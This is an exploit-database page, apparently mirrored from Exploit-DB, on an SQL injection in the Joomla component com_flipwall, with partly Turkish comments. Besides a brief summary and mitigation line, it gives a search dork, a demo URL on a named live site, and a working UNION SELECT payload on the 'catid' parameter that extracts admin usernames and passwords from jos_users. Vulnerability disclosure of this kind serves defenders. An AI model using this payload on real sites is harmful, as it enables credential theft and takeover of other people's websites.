header-logo
Suggest Exploit
vendor:
Joomla com_flipwall
by:
Fl0riX ~ Bug Researchers
7,5
CVSS
HIGH
SQL injection
89
CWE
Product Name: Joomla com_flipwall
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_flipwall SQL Injection Vulnerability

An SQL injection vulnerability exists in the Joomla component com_flipwall, which allows attackers to gain access to admin login credentials. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'catid' in the URL. The malicious query will return the admin username and password.

Mitigation:

Input validation should be used to filter out malicious characters.
Source

Exploit-DB raw data:

=========================================================
Joomla Component com_flipwall SQL Injection Vulnerability       
=========================================================

# Author        : Fl0riX ~ Bug Researchers

# Name : Joomla com_flipwall

# Bug Type : SQL injection

# Dork: "com_flipwall"

# Infection : Admin Login Bilgileri Alinabilir.

# Demo Vuln :
[+]http://0611.info/index.php?option=com_flipwall&controller=flipwall&catid=[EXPLOIT]

[+] Vendor:http://www.pulseextensions.com/

# Note: AsDemo Sitede Filtre Var Haberiniz olsun :)

# Bug Fix Advice : Zararli Karak terler Filtrenmelidir.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
null+union+select+1,2,3,4,5,concat(username,0x3a,password)fl0rix,7,8,9,10+from+jos_users--
< -- bug code end of -- >